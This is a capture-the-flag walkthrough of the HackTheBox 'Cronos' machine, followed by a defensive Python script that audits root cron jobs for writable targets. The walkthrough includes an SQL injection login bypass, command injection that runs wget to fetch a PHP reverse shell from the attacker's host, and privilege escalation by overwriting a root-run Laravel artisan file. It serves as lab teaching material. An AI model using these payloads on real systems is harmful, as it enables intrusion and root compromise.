HackTheBox - Cronos

Morten Hansen • January 30, 2022

Cronos

IP: 10.10.10.13

NMAP

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS

nslookup
10.10.10.13

13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.
dig @10.10.10.13 cronos.htb
dig  axfr  @10.10.10.13 cronos.htb

The zone transfer gives us admin.cronos.htb. Edit /etc/hosts to include 10.10.10.13 admin.cronos.htb.

This gives us a login page, which we can log in to with ' or 1=1;##". On the logged-in page we can use traceroute or ping. By using ; we can inject commands. It is not possible to get a reverse shell directly, but we can upload a PHP reverse shell. We edit the rev-shell.php file, host it on our local machine with python3 -m http.server 80, and then upload it with ; wget http://10.10.16.6/rev.php. First set up a listener in the terminal, then go to http://admin.cronos.htb/rev.php to run the script.

LinPEAS shows that the cron entry root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 is exploitable.

Insert:

$schedule->exec('cat /root/root.txt > /var/www/laravel/yes')->everyMinute();

Edit the reverse shell script and upload it again. Copy it to the machine, name it artisan, and put it in the folder /var/www/laravel/. Then set up a listener in the terminal.

Within a minute we will get a reverse connection as root.
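
The escalation above works because root's cron job runs a file that the unprivileged shell user can replace. The following is an added example, not part of the original writeup: a defender-side audit that flags root cron jobs whose script or parent directory is owned by a non-root user or is group- or world-writable. The function names and the five schedule fields in the sample line are assumptions.

```python
import os
import shlex
import stat

# Constructed sample in /etc/crontab format: the five schedule fields are
# assumed, the user and command are the job LinPEAS reported on this box.
SAMPLE = "* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1\n"


def weak_reason(path, trusted_uids):
    """Return why an untrusted user could modify `path`, or None."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None


def audit_crontab(text, trusted_uids=(0,)):
    """Flag root jobs in /etc/crontab-style text that run replaceable files.

    Each existing regular file named by absolute path in the command is
    checked together with its parent directory, because write access to
    the directory is enough to swap the file for another one.
    """
    findings = []
    for line in text.splitlines():
        fields = line.strip().split(None, 6)  # 5 schedule fields, user, command
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue
        try:
            tokens = shlex.split(fields[6])
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = fields[6].split()
        for token in tokens:
            if not (token.startswith("/") and os.path.isfile(token)):
                continue  # skips redirect targets such as /dev/null
            for target in (token, os.path.dirname(token)):
                reason = weak_reason(target, trusted_uids)
                if reason:
                    findings.append((token, target, reason))
    return findings


if __name__ == "__main__":
    for token, target, reason in audit_crontab(SAMPLE):
        print(f"root cron job runs {token}: {target} is {reason}")
```

Run it against the contents of /etc/crontab and the files in /etc/cron.d; any finding means the job's target should be owned by root and not writable by anyone else.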